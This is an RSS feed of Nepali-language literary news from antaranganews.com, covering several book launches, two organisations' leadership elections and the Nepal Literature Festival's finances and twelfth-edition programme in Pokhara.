बस्ताकोटीले ल्याए नयाँ कथाकृति- विक्रमादित्य… https://www.antaranganews.com/?p=39270 https://www.antaranganews.com/?p=39270#respond Sat, 04 Apr 2026 15:42:14 +0000 https://www.antaranganews.com/?p=39270 पोखरा, चैत २१ गते । कथाकार भूमिराज बस्ताकोटीको नयाँ कथासङ्ग्रह ‘विक्रमादित्य ! यसको उत्तर भन’ शनिवार पोखरामा लोकार्पण भएको छ ।

सिर्जनशील लोकतान्त्रिक प्रतिष्ठान, पोखराको आयोजनामा भएको कार्यक्रममा प्रमुख अतिथि सरुभक्त, विशिष्ट अतिथि रमेश श्रेष्ठ, स्रष्टा, परिचर्चाकारद्वय प्रा.डा. विष्णुप्रसाद पौडेल र डा. सवीन्द्रराज भण्डारी, संस्थाका अध्यक्ष सुरज पौडेल तथा स्रष्टाका मातापिताले कृतिको लोकार्पण गरेका थिए ।

कार्यक्रममा वरिष्ठ साहित्यकार सरुभक्तले स्रष्टाले पाठकको अपेक्षाअनुसार सिर्जना गर्दा त्यसले धेरैलाई समेट्न सक्ने र बस्ताकोटीका कथाले त्यसलाई निर्वहन गरेको विचार व्यक्त गरे ।

कृतिमाथि परिचर्चा गर्दै प्रा.डा. विष्णुप्रसाद पौडेलले सङ्ग्रहमा सङ्गृहीत २२ वटा कथालाई लामा, मध्यम तथा छोटामा वर्गीकरण गर्दै बस्ताकोटीको कथाशिल्प छोटा कथामा निकै सशक्त रहेको धारणा व्यक्त गरे । कथाभित्र विभिन्न विषय र शिल्पका कथा भए पनि अरू कथाका सापेक्षमा विनिर्मित कथाहरू सबल रहेको र त्यसले बस्ताकोटीको मौलिकतालाई पनि बोकेको विचार प्रस्तुत गरे ।

कृतिमाथि परिचर्चा गर्दै अर्का परिचर्चाकार डा. सवीन्द्रराज भण्डारीले बस्ताकोटीका कथामा आधुनिक तथा उत्तरआधुनिक विविध शिल्पसँगै अधिआधुनिकताका विविध मान्यताको पनि उपयोग भएको धारणा राखे । कतिपय कथाहरू चैतन्यको उच्चावस्थामा लेखेको र तिनले काफ्का जस्ता विश्वव्यापी सुप्रसिद्ध कथाकारका कथा पढ्दा आउने भावतर्फ आफूलाई लगेको उनको धारणा थियो ।

कार्यक्रममा कवि रमेश श्रेष्ठ र कन्या क्याम्पसका प्रमुख सुरेशकुमार मानन्धरले कथाकार बस्ताकोटीलाई सुन्दर कृति प्रकाशन गरेकामा बधाई ज्ञापन गरे ।

स्रष्टा भूमिराज बस्ताकोटीले अचेतनावस्थाबाटै आफूमा कथाप्रति आकर्षण रहेको अहिले थाहा पाएको कुरा अनुभव सुनाए । उनले  कुनै घटना र सन्दर्भप्रति प्रतिक्रियात्मक हुनु नै कथा सिर्जनाको मूल कारक रहेकाले कथा मान्छेको आदिम चेतनासँग जोडिएको विचार राखे ।

बस्ताकोटीका यसअगि परिस्थिति (२०५९), निर्मोचन (२०६८) र निमित्त मात्र (२०७१) गरी ३ उपन्यास, कार्निभल (२०७६) कथा सङ्ग्रह र स्वैरकल्पना र उपन्यासकार ध्रुवचन्द्र गौतम (२०६६) समालोचना प्रकाशित छन् । बस्ताकोटी पोखराकै कन्या क्याम्पसमा प्राध्यापनरत छन् ।

सिर्जनशील लोकतान्त्रिक प्रतिष्ठानका अध्यक्ष सुरज पौडेलको अध्यक्षतामा भएको कार्यक्रममा उपाध्यक्ष डा. श्रीधर न्यौपानेले स्वागत मन्तव्य राखेका थिए भने सचिव डा. पीताम्बर पौडेलले कार्यक्रम सञ्चालन गरेका थिए ।

]]>
https://www.antaranganews.com/?feed=rss2&p=39270 0
साहित्यकार विमला ढुंगना निरौलाको कथासंग्रह ‘प्रेमाश्रु’ लोकार्पण https://www.antaranganews.com/?p=38346 https://www.antaranganews.com/?p=38346#respond Tue, 10 Feb 2026 02:45:59 +0000 https://www.antaranganews.com/?p=38346 काठमाडौं– साहित्यकार विमला ढुंगना निरौलाको कथासंग्रह ‘प्रेमाश्रु’ लोकार्पण गरिएको छ । स्रष्टा समाजका अध्यक्ष श्रीओम ‘रोदन’को प्रमुख आतिथ्यतामा यहाँ आयोजित एक विशेष कार्यक्रमबीच उक्त कृति माघ २६ गते लोकार्पण गरिएको हो ।
प्रमुख अतिथि स्रष्टा समाजका अध्यक्ष श्रीओम ‘रोदन’, कार्यक्रमका सभापति कृष्ण भुसाल, समिक्षक प्राडा.यज्ञश्वर निरौला, कृतिकार निरौला, साहित्यकार प्रमोद प्रधान, कृतिका सम्पादक रमेश दाहाल, गीतकार संघका अध्यक्ष वसन्त वित्यासी थापालगायत मञ्चासिन व्यक्तित्व र अग्रभागमा रहनुभएका सम्पूर्ण व्यक्तित्वले उक्त कृतिको लोकार्पण गर्नुभएको हो ।
प्रमुख अतिथि श्रीओम श्रेष्ठ रोदनले आफू विमलाका साहित्य रचनासँग परिचित रहेको बताउँदै उहाँलाई बालसाहित्य, कविता, गीतकारका रूपमा चिनिँदै आए पनि अब कथाकारका रूपमा चिनिने छ भन्नुभयो । प्रमुख अतिथि रोदनले पछिल्लो समय साधना बिनै नै धेरै व्यक्ति लेखनमा आउँदै कृति सार्वजनिक गर्ने प्रवृत्ती बढेको बताउँदै निरौला सानैदेखि यो क्षेत्रमा रहेर धेरै कृति पाठकमाझ ल्याएको स्मरण गर्नुभयो ।
उक्त लोकार्पण कार्यक्रममा स्रष्टा विमला निरौलालाई मिलाप कभर सम्मान पनि हस्तान्तरण गरिएको थियो । कार्यक्रममा विश्व कीर्तिमानी सङ्गीकार सन्तोष श्रेष्ठ, साहित्यकार सीता पाण्डे, लक्ष्मी उप्रेती, डा. फणिन्द्रराज निरौला र गीतकार संघका अध्यक्ष वसन्त वित्यासी थापाले शुभकामना मन्तव्य राख्नुभएको थियो । उहाँहरूले बालसाहित्यमा कलम चलाउँदै आउनुभएकी स्रष्टा विमलालाई कथासङ्ग्र्रहका लागि बधाई तथा शुभकामना दिँदै संग्रहमा रहेको कथा उत्कृष्ट रहेको धारणा राख्नु भएको थियो ।
कृतिको समिक्षा गर्दै डा. यज्ञश्वर निरौलाले अधिकांश कथा प्रेमसँग सम्बन्धित रहेको, नेपालबाहिर अमेरिका र नेपाली परिवेशका जनजीवनका कथा रहेको बताउनुभएको थियो । ‘समाजका विविध विषयलाई कथाका रूपमा एकै कृतिमा उनेर विमलाले पाठकसमक्ष प्रस्तुत गर्नुभएको छ’, डा.निरौलाले भन्नुभयो, ‘समाजमा रहेका रीति र विकृति सरल तर गहन, सजीव बाचाल रूपमा यसमा प्रस्तुत भएका छन् ।’
साहित्यकार प्रमोद प्रधानले स्रष्टा विमला निरौला साहित्य सिर्जना सँगसँगै समाज सेवामा पनि त्यतिकै सशक्त रूपमा लाग्दै आएको व्यक्तित्व भएको बताउँदै नेपाल बाल साहित्य समाजमा पनि उहाँको योगदानका बारेमा प्रकाश पार्नुभएको थियो ।
स्रष्टा विमलाले आफूले बाल साहित्यमा अलिक धेरै कलम चलाउँदै आए पनि सबै विधामा कलम चलाइरहेको बताउँदै पछिल्लो कृति ‘प्रेमाश्रु’ले पाठकको मन जित्नेमा आशावादी रहेको बताउनुभयो ।
कृतिका सम्पादक रमेश दाहालले स्वागत मन्तव्य राख्दै छोटो समयमै ‘प्रेमाश्रु’ पाठकमाझ ल्याएको बताउनुभयो । कार्यक्रमका सभापति कृष्ण भुसलाले ‘प्रेमाश्रु’मा धेरै कथामा प्रेमलाई प्राथमिकता दिएर लेखिएको बताउँदै प्रेम दिवसमा पाठकमाझ आएको बताउनुभयो । उहाँले मिलापले गर्दै आएका कार्यको चर्चा गर्नुभएको थियो ।
किशोर गौतमको वर्णविन्यास रहेको २०० पृष्ठको यस कृतिमा ‘प्रणय प्रेम, प्रेम र मानवताको खाता, प्रेमको क्षमादान, हुर्रे !, प्रेमिक्षा, स्वप्निल प्रेम, अतृप्त प्रेम, प्रेम जीवन, अस्ताएको प्रेम, प्रेम पैयाँ, प्रेम र आराधना, आफैंसँगको प्रेम, अपराजित प्रेम, प्रेमका आँसु, प्रेम संकल्प, प्रेम प्रस्ताव, प्रेमको अवशेष, भय, सपना कुरा, तीजको रहर, नारी दिवस, पुरस्कार, अनिश्चित आयु, प्रेमको पुनर्मिलन, माला र गला, भलाद्मी, अनुत्तरित बाध्यता, प्रेमील साकुरा, बेहुला मामाको बटुक भान्जा’ जस्ता २९ कथा समाविष्ट गरिएको छ ।
स्रष्टा निरौलाका यसअघि ‘तिमी विनाको हाम्रो जीवन, (बालकविता सङ्ग्रह), बाल मन (बालचित्र कविता– सङ्गालो), बादल र ऋतृ (बालचित्र काव्य), तीन चरी, पशुपक्षी (बालचित्र कविता– सङ्गालो), बाल–बगैँचा (बालकविता– सङ्गाले), ठूलो भाइ के बन्ने ? (बालसंवाद चित्र–कविता), निर्दोष कोपिला (बालगीत सङ्ग्रह), काव्यपराग (मुक्तकसङ्ग्रह), यात्रामा देश (बाल नियात्रा सङ्ग्रह)जस्ता एक दर्जन कृति पाठकमाझा आएका छन् । विगत लामो समयदेखि भर्जिनिया, अमेरिकामा बस्दै आउनुभएकी निरौला अन्तर्राष्ट्रिय नेपाली साहित्य समाज (अनेसास)को निर्वतमान महासचिव हुनुहुन्छ । विभिन्न मानसम्मान र पुरस्कारबाट विभूषित उहाँ अन्य सामाजिक संघसंस्थामा पनि रहेर कुशल कार्य सम्पादन गर्दै आउनुभएको छ ।
कार्यक्रममा डा. बुनु दाहाल, लक्ष्मण सिटौला, उर्मिला ढुंगाना सुवेदी, ललिता दोषी, रेनुका भट्टराई, जनक रावल, शैलेन्द्र चापागाईं, सानुकाजी श्रेष्ठ, तुलसी गिरी, भोला अधिकारी, रश्मि रिजाल, माधव ढुंगाना, प्रज्ञा ढुंगाना, विनिता देवकोटा, शारदा पन्त, कमला पन्थी अधिकारी, शोभा ढुंगाना, मिनु पोखरेल, राजकुमार खड्का, आयुसा पौडेल, रुकमिणा घिमिरे, सिर्जना अर्याल, सुभद्रा चन्द, अमृता स्मृति, सावित्रा पुडासैनी, सुरेन्द्र थापालगायत साहित्य क्षेत्रका विशिष्ठ व्यक्तित्वको बाक्लो उपस्थिति रहेको थियो ।
मिलाप पब्लिकेशनले प्रकाशन र ई. प्रेस प्रालि. मुद्रण रहेको यस कृतिमा महाकाव्यकार खेमनाथ दाहालको ‘प्रेमाश्रुमा डुबेपछि’ भूमिका समावेश छ भने अन्तर्राष्ट्रिय नेपाली साहित्य समाज (अनेसास) बोर्ड अफ ट्रष्टीका सभापति पदम विश्वकर्मा र भागीरथी श्रेष्ठको शुभकामना साथै स्रष्टा निरौलाको लेखकीय समाविष्ट छ । ‘प्रस्तुत कृत समसामयिक घटनालाई विषयवस्तु बनाएर सरल भाषामा लेखिएको एक मार्मिक र भावपूर्ण कृति हो । यस कृतिका कथाहरू पढ्दै गर्दा कृतिकार मिला निरौलाले जीवनको लामो अन्तरालमा देखेका भोगेका र अनुभूत गरेका विषयलाई कथाका रूपमा प्रकट गरेको आभास हुन्छ’, महाकाव्यकार खेमनाथ दाहालले आफ्नो भूमिकामा भन्नुभएको छ ।
साहित्यकार भैरवी भुगोलको सञ्चालन गर्नु भएको सो कार्यक्रम मिलाप पब्लिकेशनको आयोजनामा भएको हो ।
तस्वीर ः सुरेन्द्र थापा

]]>
https://www.antaranganews.com/?feed=rss2&p=38346 0
नेलेसको गण्डकी प्रदेशमा लमजुङका समीप https://www.antaranganews.com/?p=37192 https://www.antaranganews.com/?p=37192#respond Sat, 13 Dec 2025 16:52:58 +0000 https://www.antaranganews.com/?p=37192 पोखरा, मङ्सिर २७ गते । नेपाली लेखक सङ्घ, गण्डकी प्रदेशको दोस्रो अधिवेशनले साहित्यकार दीपक समीप (लमजुङ) लाई सर्वसम्मत अध्यक्ष चयन गरेको छ

त्यसैगरी नव निर्वाचित कार्यसमितिको उपाध्यक्षमा लक्ष्मण थापा (कास्की), महिला उपाध्यक्षमा हिममाया पौडेल (कास्की), महासचिवमा सञ्जीव पौडेल (कास्की) , सचिवमा मोती च्वाईं (पर्वत ), कोषाध्यक्षमा चन्द्रावती वाग्ले (तनहुँ ), सदस्यहरुमा रमेशमोहन भट्टराई (कास्की), केशव अमगाइ (गोरखा), अम्बिकाप्रसाद भट्टराई (तनहुँ) र मणि डुम्रे (नवलपुर) रहेका छन्

 नेपाली लेखक सङ्घका निवर्तमान सचिव डा. गणेश शर्मा संयोजक र नेपाली लेखक सङ्घका केन्द्रीय सदस्य अमृत क्षेत्री सदस्य रहेको निर्वाचन समितिले सर्वसम्मत रूपमा नयाँ कार्यसमिति छनोट गरेको हो कार्यक्रममा नेपाली लेखक सङ्घ, गण्डकी प्रदेशका नवनिर्वाचित अध्यक्ष दीपक समीपले सर्वसम्मत रूपमा निर्वाचन सम्पन्न गरेकामा निर्वाचन समितिलाई धन्यवाद ज्ञापन गरेका थिए । समीपले विविध साहित्यिक गतिविधिहरूमार्फत संस्थालाई क्रियाशील संस्थाको गरिमा अझै उच्च बनाउने प्रतिबद्धता व्यक्त गरे कार्यक्रममा नेपाली लेखक सङ्घका निवर्तमान केन्द्रीय अध्यक्ष साहित्यकार तीर्थ श्रेष्ठ , केन्द्रीय सचिव मिलन समीर, गण्डकीका निवर्तमान अध्यक्ष डा. ईश्वरमणि अधिकारी कास्कीका संस्थापक अध्यक्ष लक्ष्मीशरण अधिकारी र निर्वाचन समितिका संयोजक डा. गणेश शर्माले शुभकामना दिएका थिए ।

 

]]>
https://www.antaranganews.com/?feed=rss2&p=37192 0
ऋषि लामिछानेको नेतृत्वमा अन्तर्राष्ट्रिय नेपाली कलाकार समाज https://www.antaranganews.com/?p=36797 https://www.antaranganews.com/?p=36797#respond Wed, 19 Nov 2025 11:57:20 +0000 https://www.antaranganews.com/?p=36797 काठमाडौँ । अन्तर्राष्ट्रिय नेपाली कलाकार समाज (इनास), नेपाल शाखाको दोस्रो अधिवेशन काठमाडौँमा सम्पन्न भएको छ । अधिवक्ता सेमन्तमणि खेराल प्रमुख निर्वाचन आयुक्त रहेको अधिवेशनले चलचित्र निर्देशक ऋषि लामिछानेको अध्यक्षतामा १७ सदस्यीय कार्य समिति चयन गरेको छ ।

कार्यसमितिको उपाध्यक्षमा क्रमशः रमेश उप्रेती, रेजिना उप्रेती र युवराज चौलागाईँ निर्वाचित भएका छन् भने शंकर पाण्डे र राजिन पनेरू महासचिव र सचिव पदमा निर्वाचित भएका छन् । यसैगरी कोषाध्यक्षमा रत्न श्रेष्ठ एवम् सदस्यमा क्रमशः खुमन अधिकारी, एलिना चौहान, पूर्णबहादुर लामा, दिनेश काफ्ले, प्रियङ्का प्रसाईँ, गौतम मानन्धर, सहारा पाण्डे, दीपा रेग्मी पन्त, ऋतु कँडेल र शिवम अधिकारी निर्विरोध निर्वाचित भएका छन् ।  यसैगरी ग्लोबल सञ्चार प्रतिनिधिका रूपमा सञ्चारकर्मी विष्णु शर्मा चयन भएका छन् ।

निवर्तमान अध्यक्ष एवम् हाल एसिया संयोजकका रूपमा रहेका दयाराम पाण्डेयको अध्यक्षतामा सम्पन्न कार्यक्रमको प्रमुख आतिथ्यता इनास ग्लोबल अध्यक्ष अर्जुनप्रसाद काफ्लेले गरेका थिए । काफ्लेले इनासले विश्वभर छरिएर रहेका नेपालीहरूका कला, साहित्य, संस्कृति, भाषा, खेलकुद जस्ता बहुविध विधालाई समेट्दै सोको प्रबर्धनमा विशेष भूमिका निर्वाह गर्ने र आफ्नो कार्यकालले त्यसका लागि आवश्यक पहल गर्ने जानकारी दिए । काफ्लेले इनासले एनआरएनका दोस्रो-तेस्रो पुस्तालाई नेपाली भाषा सिकाउने गरी नेपाली पाठशालाको स्थापना गर्दै कार्य अगाडि बढाएको समेत जानकारी दिए । यसैगरी सन् २०२५-२०२७ कार्यकालका लागि अध्यक्ष पदमा निर्वाचित लामिछानेले आफू र आफ्नो कार्यसमितिले इनासको विधानको मर्मअनुसार कर्म गर्दै विश्वभर रहेका नेपाली कलाकारको भावनालाई कदर गर्ने गरी आगामी कार्ययोजना तय गर्ने प्रतिबद्धता व्यक्त गरे ।

इनास नेपाल शाखाको वर्तमान कार्यसमितिभित्र चलचित्र, गीत-सङ्गीत, भाषासाहित्य, खेलकुद, कलाकारिता, पत्रकारितालगायत बहुविध विधाका विशेषज्ञहरूको प्रतिनिधित्व रहेको र यसलाई आवश्कताअनुसार थप परिष्कृत एवम् परिमार्जित गर्दै लैजान आफूहरू प्रतिबद्ध रहेको जानकारी एसिया संयोजक एवम् नेपाल शाखाका संस्थापक दयाराम पाण्डेयले दिए । कार्यक्रममा इनासका संरक्षक नीता श्रेष्ठ, ग्लोबल कोषाध्यक्ष रूपा न्यौपानेलगायतले शुभकामना मन्तव्य दिएका थिए ।

इनास विश्वभर छरिएका नेपाली कलाकारको हकहितका पक्षमा काम गर्ने र संसारभरि नेपाली संस्कृति, भाषा, साहित्य, कलाकारिता आदिलाई पुर्‍याउने गरी सन् २०१२ मा पोल्याण्डमा स्थापना भएको सामाजिक संस्था हो । यसको हालसम्म झण्डै ७३ देशमा आफ्नो शाखा स्थापना भइसकेको छ ।

]]>
https://www.antaranganews.com/?feed=rss2&p=36797 0
भीम रानाभाटको छैटौँ कृति सार्वजनिक https://www.antaranganews.com/?p=30262 https://www.antaranganews.com/?p=30262#respond Wed, 26 Feb 2025 14:52:57 +0000 https://www.antaranganews.com/?p=30262 पोखरा, फागुन १४ गते । साहित्यकार भीम रानाभाटको संस्मरण सङ्ग्रह ‘सम्झनाको सेरोफेरो’ बुधवार पोखरामा सार्वजनिक गरिएको छ ।

नेपाल प्रज्ञा प्रतिष्ठानका प्राज्ञ डा. कृष्णराज अधिकारी, प्राज्ञ सभा सदस्य नारायण मरासिनी र लेखक रामराज रेग्मीले कृतिको सार्वजनिकसमेत गरेका हुन् । कृतिको परिचर्चा गर्दै साहित्यकार रुपिन्द्र प्रभावीले समाजप्रति उत्तरदायी र सोद्देश्य लेखनमा प्रतिबद्ध लेखक भीमले नियात्रा होस् वा व्यक्ति-संस्मरणमा विचार पक्षलाई नजानिँदो पाराले घुसाएको बताए । र्‍यान्डम रिडर्स सोसाइटका अध्यक्षसमेत रहेका प्रभावीले शब्दमार्फत नेपालका विभिन्न भूभागको भ्रमण गराउन सफल संस्मरणहरूले भीमलाई सफल गद्य लेखकका रूपमा स्थापित गराएको भनाइ राखे । ‘कला, साहित्य र संस्कृतिप्रति उच्च सम्मानभाव प्रकट गर्दै भीमले नेपाली जनजीवनको चित्रण गरेका छन्’ उनले भने, ‘नेपालका विभिन्न क्षेत्रका स्थापित व्यक्तिसँग सम्बन्धित संस्मरणलाई पनि उनले भजनशैलीभन्दा माथि उठेर लेखेका छन् ।’

संस्कृतिकर्मी लोकबहादुर थापा मगरले ‘सम्झनाको सेरोफेरो’ माथि समीक्षा गर्दै १९ वटा जीवन जगत्‌सँग सम्बन्धित संस्मरणले कृतिलाई गहन बनाएको धारणा राखे । उनले कृतिमा जीवनवादी सौन्दर्यशास्त्रको प्रस्तुति रहेको बताए ।

प्रमुख अतिथि नेपाल प्रज्ञा प्रतिष्ठानका दर्शनशास्त्र विभागका प्रमुख डा. कृष्णराज अधिकारीले भीम इमानदार लेखक भएको बताए । भीमलाई सर्जक र साहित्यिक सङ्गठकका रूपमा समेत चिनाउँदै डा. अधिकारीले भीमको लेखनले पाठकलाई छिटै आकर्षण गर्ने सामर्थ्य राख्ने बताए ।

गण्डकी साहित्य सङ्गमद्वारा आयोजित कार्यक्रममा रामराज रेग्मी, डा.श्रीकान्त शर्मा खतिवडा, नारायणकैलाश सिग्देल, परशुराम कोइराला, डोलराज पाण्डे, झलकपाणि तिवारीलगायतका वक्ताले भीम रानाभाटको साहित्यिक यात्रा र योगदानले नेपाली साहित्यमा प्रगतिशील चेतनाको प्रवाहमा महत्त्वपूर्ण भूमिका खेलेको बताए ।

लेखक रानाभाटले आफूले जीवनयात्राका क्रममा भेटेका पात्र र स्थानका बारेमा आफ्ना अनुभूतिहरू लेख्दै जाँदा कृति तयार भएको बताए । उनले आफूले भोगेका र देखेका कुरालाई इमानदारीपूर्वक लेख्ने प्रयास गरेको बताउँदै लेखनले किनारीकृत सम्प्रदायका लागि केही योगदान गरोस् भन्ने आफ्नो इच्छा रहेको सुनाए ।

भीम नेपाली साहित्यमा प्रगतिशील चेतनाका सशक्त हस्ताक्षर हुन् । उनी तनहुँको म्याग्दे गाउँपालिका-२, जामुने, थान्सिङमा वि.सं. २०२३ सालमा जन्मिएका हुन् र हाल पोखरालाई आफ्नो कर्मथलो बनाएका छन् । साहित्यिक क्षेत्रमा ‘ज्यालादारी’ उपनामले परिचित रानाभाटका यसअघि रगतका छिर्का (मुक्तक सङ्ग्रह, २०४९), रङ, रगत र मान्छे (कविता सङ्ग्रह, २०६४), यही हो मेरो देश (मुक्तक सङ्ग्रह, २०७०), आँसुको छाल (हाइकु सङ्ग्रह, २०७३) र पग्लदैन सगरमाथा (गीत सङ्ग्रह, २०७४) प्रकाशित छन् ।

उनी पोखराबाट प्रकाशित मितेरी, प्रयोग, गण्डकी सङ्गम, साहित्य प्रभा, निगालो पत्रिकाका सम्पादक र व्यवस्थापक रहेका छन् । साहित्य शृङ्खला, गण्डकी साहित्य सङ्गम, प्रगतिशील लेखक सङ्घ, अखिल नेपाल लेखक सङ्घ लगायत दर्जन बढी साहित्यिक संस्थाको नेतृत्व गरेका उनको जीवन शैली र लेखनमा तादम्यता देखिने वक्ताहरूले औँल्याए ।

सङ्गम सांस्कृतिक मञ्चका काजी गाउँले र विकास लुङ्गेलीले रानाभाटको शब्द रचनामा स्वागत गीत प्रस्तुत गरेका थिए । गण्डकी साहित्य सङ्गमका उपाध्यक्ष पद्मराज ढकालले स्वागत मन्तव्य राखेका कार्यक्रमको सञ्चालन सचिव नारायण मरासिनीले गरेका थिए ।

 

]]>
https://www.antaranganews.com/?feed=rss2&p=30262 0
लिटरेचर फेस्टिभललाई ३६ लाखभन्दा बढी घाटा, बाह्रौँ संस्करण फागुन १५ देखि https://www.antaranganews.com/?p=30184 https://www.antaranganews.com/?p=30184#respond Fri, 21 Feb 2025 13:40:45 +0000 https://www.antaranganews.com/?p=30184 पोखरा, फागुन ९ गते । नेपाल लिटरेचर फेस्टिभललाई ३६ रुपियाँभन्दा बढी घाटा लागेको पोखरामा आयोजित पत्रकार सम्मेलनमा जानकारी दिइएको छ । कार्यकारी निर्देशक निरज भारीले पत्रकार सम्मेलनमा फेस्टिभलको आयोजक ३६ लाख ७३ हजार रूपियाँ घाटामा रहेको  जानकारी गराए । एघारौँ संस्करणमा एक करोड १० लाख ९२ लाख रूपियाँ आम्दानी र एक करोड १४ लाख ७६ हजार रूपियाँ खर्च भएको उनले सुनाए । गत संस्करणमा मात्र ३ लाख ८३ हजार ३ सय ६० रूपियाँ घाटा भएको थियो । ‘दसौँ संस्करणमा हामीसँग टाइटल स्पोन्सर थिएन । त्यसैले त्यो संस्करणको घाटा अहिलेसम्म व्यहोर्नुपरेको छ,’ भारीले भने, ‘पोखराका साहित्यप्रेमी र देशका अग्रज र समकालीन लेखकहरूको साथले हामीलाई यो फेस्टिभल निरन्तर गर्न झकझकाएको छ । नाफा घाटाभन्दा पनि फेस्टिभलले साहित्य र कला क्षेत्रलाई के दियो भन्ने प्रमुख विषय हो ।’

घाटाका बाबजुद पनि नेपाल लिटरेचर फेस्टिभलको बाह्रौँ संस्करण फागुन १५ देखि १८ गतेसम्म पोखरामा हुने भएको छ । आयोजक बुकवर्म फाउन्डेसनले शुक्रबार पोखरामा पत्रकार सम्मेलन गरेर अघिल्ला संस्करण जस्तै यस वर्ष पनि फेवाताल किनारको बाराही घाटमा महोत्सव हुने जानकारी दिएको हो । ‘साहित्यको कुम्भमेला’ मानिने फेस्टिभलको यो संस्करणको मुख्य प्रस्तुतकर्ता एनसेल फाउन्डेसन हो ।

सेसन कक्ष र स्टल तयारीको काम अन्तिम चरणमा पुगेको फेस्टिभलका कार्यकारी निर्देशक नीरज भारीले जानकारी दिए । फेस्टिभलमा ५० भन्दा बढी छलफल सत्र, अन्तरक्रियात्मक कार्यक्रम, साङ्गीतिक प्रस्तुति र अन्य रचनात्मक कार्यक्रम समावेश गरिएका छन् । देश/विदेशका दुई सयभन्दा बढी साहित्यकार, राजनीतिज्ञ, लेखक, कलाकार, सम्पादक, पत्रकारलगायतको उपस्थिति रहने छ । फेस्टिभलमा साहित्यसँग जोडिएका सामाजिक, राजनीतिक, आर्थिक, नवीन प्रविधि, सिनेमालगायत विविध क्षेत्रका विषयमाथि गम्भीर मन्थन हुने छ ।

यसपटक प्राध्यापक तथा अर्थशास्त्री महेन्द्र पी लामाको विद्वत् प्रवचनसँगै फेस्टिभल सुरू हुने कार्यकारी निर्देशक निरज भारीले जानकारी दिए । उनी इन्दिरा गान्धी ओपेन यूनिभर्सिटी (आईजीएओयू)को प्रो–उपकुलपति र भारतको सिक्किम विश्वविद्यालयका संस्थापक उपकुलपतिसमेत हुन् । उनी भारतको राष्ट्रिय केन्द्रीय विश्वविद्यालयको सबैभन्दा कान्छा उपकुलपतिसमेत बनेका थिए ।

विद्वत् प्रवचनलगत्तै अध्यात्म र संघर्षमाथि अभिनेत्री मनीषा कोइराला र पत्रकार विजय कुमारको विशेष संवाद हुनेछ । यसैगरी महानायक राजेश हमालको पुस्तक ‘युगदेखि युगसम्म’को आवरण तथा पुस्ताकांश लोकार्पण पनि विविध विशेष सत्रमध्ये एक हो । हमालको पुस्तक प्रकाशोन्मुख छ ।

फेस्टिभलमा उद्यमी एव लेखक जीवा लामिछानेको बहुप्रतीक्षित पुस्तक ‘अक्षत अन्टार्कटिका’को लोकार्पण हुने आयोजकले जनाएको छ । नेपाली क्रिकेटका ढुकढुकी पारस खड्का हुन् या साहित्यानुरागीबीच चर्चित भूषिता वशिष्ठ, समाजसेवालाई आफ्नो कर्म बनाएका डा. भगवान कोइरालादेखि म्यागी डोएनसम्मको प्रेरणादायी संवाद फेस्टिभलमा रहनेछन् । म्यागी अमेरिकन समाजसेवी हुन् । सुर्खेतस्थित एक बालगृहको सहसंस्थापक उनी सन् २०१५ को सीएनएन हिरो हुन् ।

नेपाली अमेरिकी लेखक रञ्जन अडिगाको सहभागिता फेस्टिभलका दुई सत्रमा रहनेछ ।  उनको छोटो कथा संग्रह, ‘लिच एण्ड अदर स्टोरीज’माथि उनी र भूषिता वशिष्ठबीच संवाद हुनेछ । उनका कथा र लेखहरू स्टोरी क्वार्टरली, द न्यू योर्क टाइम्स, हफी पोस्ट, द साल्ट लेक ट्रिब्यून, लगायतमा प्रकाशित छन् । उनी वेस्टमिन्स्टर विश्वविद्यालय, साल्ट लेक सिटी र युटामा रचनात्मक लेखनविधि पढाउँछन् ।

फेस्टिभलको यो संस्करणमा दुई फरक पुस्ताका लेखकको पुस्तकमाथि विमर्श हुनेछ । अग्रज वामपन्थी नेता एवम् नेकपा मसालका महामन्त्री मोहनविक्रम सिंहद्वारा लिखित उपन्यास ‘कामरेड जलजला’माथि विमर्श हुने र ६ वर्षीय भूमिलक्ष्मी पराजुलीको ‘मरमेड, ह्वेल एन्ड प्रिन्सेस’ नामक चित्रकथा पुस्तक सार्वजनिक गरिने फेस्टिभलका निर्देशक अजित बरालले जानकारी दिए । ८९ वर्षीय सिंहको एक हजार ३२० पृष्ठको उपन्यास नेपालमा प्रकाशित सबैभन्दा ठुलो पुस्तक भएको बताइन्छ ।

परम्परागत धुनदेखि पपसम्म वा यी दुवै विधाका सङ्गीतको मिश्रणले फेस्टिभलका साँझहरूलाई संगीतमय बनाउनेछ । साङ्गीतिक कार्यक्रमहरूमा प्रोजेक्ट सारङ्गीअन्तर्गत किरण नेपालीको नेतृत्वमा सामूहिक प्रस्तुति हुनेछ । त्यस्तै नेपाली सङ्गीतका पप–सम्राटका रूपमा परिचित ओमविक्रम विष्टले पनि फेस्टिभललाई गुञ्जायमान बनाउनेछन् ।

परम्परागत धुन र लयहरूलाई समकालीन परिवेश सुहाउँदो स्वरूप दिने साङ्गीतिक समूह ‘सोनागी ब्लुज’ले पनि फेस्टिभलमा प्रस्तुति दिनेछ । काठमाडौँ विश्वविद्यालयको संगीत विभागका विद्यार्थीहरूको सामूहिक परियोजनाका रूपमा सुरु भएको यस ब्यान्डको संगीतमा नेपाली लोक, रक र भारतीय शास्त्रीय सङ्गीतको समिश्रण सुन्न सकिन्छ ।

सिर्जनाको अर्को विधा चित्रकलालाई यस वर्ष पनि प्राथमिकता दिइएको कार्यकारी निर्देशक भारीले सुनाए । यस संस्करणमा परम्परागत पौभा चित्रका विश्व प्रसिद्ध कलाकार लोक चित्रकारका चित्र प्रदर्शनीमा राखिने उनले जानकारी दिए ।

विश्वप्रसिद्ध भारतीय लेखक शशि थरूरको पुस्तक ‘ह्वाई आई एम अ हिन्दू’को नेपाली संस्करण लोकार्पणसँगै फेस्टिभलको समापन हुने छ । भारतीय राजनीति, इतिहास र अन्तर्राष्ट्रिय सम्बन्धका विश्लेषक तथा चर्चित लेखक थरूरका कैयौं पुस्तकले विश्वव्यापी चर्चा पाएका छन् ।

शुक्रबार पोखरामा आयोजित पत्रकार सम्मेलनमा बोल्दै फेस्टिभलका निर्देशक अजित बरालले सन् २०११ देखि नेपाल लिटरेचर फेस्टिभलको आयोजनापछि नेपालमा वार्षिक रूपमा दर्जनौं साहित्यिक महोत्सव हुन थालेको र यो निकै खुसीको कुरा भएको बताए । ‘सुर्खेत, काठमाडौँ, पोखरा, धादिङ, काँकडभिट्टा, विराटनगर र टीकापुरमा साहित्य र विचारका महोत्सव गरिँदै छन्,’ उनले भने, ‘यस्ता फेस्टिभलले ‘पब्लिक डिस्कोर्स’लाई बलियो बनाएका छन् । यसको श्रेय नेपाल लिटरेचर फेस्टिभललाई जान्छ ।’

